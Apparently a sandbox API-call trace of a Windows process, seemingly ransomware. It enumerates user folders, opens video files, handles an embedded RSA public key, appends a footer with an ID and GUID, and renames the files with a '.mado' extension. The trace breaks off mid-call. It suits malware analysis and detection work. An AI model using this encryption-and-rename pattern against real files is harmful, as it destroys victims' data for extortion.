PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.863] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.863] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0204.863] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.863] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.863] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.863] PathFindFileNameW (pszPath="") returned="" [0204.863] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0204.864] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.864] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.864] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0204.864] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.864] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.864] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.864] PathFindFileNameW (pszPath="") returned="" [0204.864] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0204.864] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.864] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.864] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0204.864] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.864] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.864] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.864] PathFindFileNameW (pszPath="") returned="" [0204.864] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdab224a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdab224a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0204.864] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdab224a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdab224a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0204.865] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a4399c0, ftCreationTime.dwHighDateTime=0x1d5e37e, ftLastAccessTime.dwLowDateTime=0xb3c11810, ftLastAccessTime.dwHighDateTime=0x1d5e794, ftLastWriteTime.dwLowDateTime=0xb3c11810, ftLastWriteTime.dwHighDateTime=0x1d5e794, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-Na1oMmnUTFTw3KDwZd", cAlternateFileName="-NA1OM~1")) returned 1 [0204.865] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63fc6cf0, ftCreationTime.dwHighDateTime=0x1d5e78d, ftLastAccessTime.dwLowDateTime=0x42056550, ftLastAccessTime.dwHighDateTime=0x1d5e636, ftLastWriteTime.dwLowDateTime=0x42056550, ftLastWriteTime.dwHighDateTime=0x1d5e636, nFileSizeHigh=0x0, nFileSizeLow=0xd0a7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5SGmdOZOkvK3.avi", cAlternateFileName="5SGMDO~1.AVI")) returned 1 [0204.865] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5SGmdOZOkvK3.avi") returned=".avi" [0204.865] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5SGmdOZOkvK3.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5sgmdozokvk3.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.866] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=53415) returned 1 [0204.866] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.868] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xd081, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.868] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.869] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xd0a7, lpOverlapped=0x0) returned 1 [0204.870] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.870] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.870] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.870] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.871] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.871] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.871] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.871] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.871] GetLastError () returned 0x0 [0204.871] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.871] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.871] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.871] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.871] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.872] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c8d0 [0204.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.872] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xd0a7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.872] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.873] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.873] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.873] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.873] CloseHandle (hObject=0x63c) returned 1 [0204.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b20 | out: hHeap=0x2c0000) returned 1 [0204.874] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5SGmdOZOkvK3.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5sgmdozokvk3.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5SGmdOZOkvK3.avi.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5sgmdozokvk3.avi.mado")) returned 1 [0204.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.876] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.877] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x188398a0, ftCreationTime.dwHighDateTime=0x1d5da1a, ftLastAccessTime.dwLowDateTime=0x9f6ccd0, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0x9f6ccd0, ftLastWriteTime.dwHighDateTime=0x1d5db55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="biDMIzVx5WSAFsePg", cAlternateFileName="BIDMIZ~1")) returned 1 [0204.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2df0 [0204.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67078 [0204.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2df0 | out: hHeap=0x2c0000) returned 1 [0204.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b20 | out: hHeap=0x2c0000) returned 1 [0204.878] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.878] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned=".ini" [0204.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.878] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1a57fd0, ftCreationTime.dwHighDateTime=0x1d5d7e3, ftLastAccessTime.dwLowDateTime=0xcf758270, ftLastAccessTime.dwHighDateTime=0x1d5d7cd, ftLastWriteTime.dwLowDateTime=0xcf758270, ftLastWriteTime.dwHighDateTime=0x1d5d7cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ee2U4KlmK-3zpwEnEyLp", cAlternateFileName="EE2U4K~1")) returned 1 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x310) returned 0x3b74b68 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff1f8 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff2c8 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32fed80 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32fede8 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2df0 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b672d0 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67348 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b673c0 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67438 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32fed18 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3218d0 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b674b0 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67528 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b675a0 [0204.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321848 [0204.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67618 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff260 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff190 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb78 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2c88 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff128 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2d78 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b670f0 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67168 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b671e0 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67258 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff330 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2d00 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b98 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2c10 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3217c0 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3217c0 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.879] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30afe540, ftCreationTime.dwHighDateTime=0x1d5e38f, ftLastAccessTime.dwLowDateTime=0x64cca8f0, ftLastAccessTime.dwHighDateTime=0x1d5dfb0, ftLastWriteTime.dwLowDateTime=0x64cca8f0, ftLastWriteTime.dwHighDateTime=0x1d5dfb0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iMNzi0f_lMj", cAlternateFileName="IMNZI0~1")) returned 1 [0204.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67078 [0204.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67258 [0204.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b671e0 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67258 | out: hHeap=0x2c0000) returned 1 [0204.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0204.880] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x601b92e0, ftCreationTime.dwHighDateTime=0x1d5e6d5, ftLastAccessTime.dwLowDateTime=0xa3de5fe0, ftLastAccessTime.dwHighDateTime=0x1d5e774, ftLastWriteTime.dwLowDateTime=0xa3de5fe0, ftLastWriteTime.dwHighDateTime=0x1d5e774, nFileSizeHigh=0x0, nFileSizeLow=0x13d82, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TR2H0s.mkv", cAlternateFileName="")) returned 1 [0204.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.880] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TR2H0s.mkv") returned=".mkv" [0204.880] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TR2H0s.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tr2h0s.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.880] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=81282) returned 1 [0204.880] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.882] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x13d5c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.882] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.884] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.884] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, 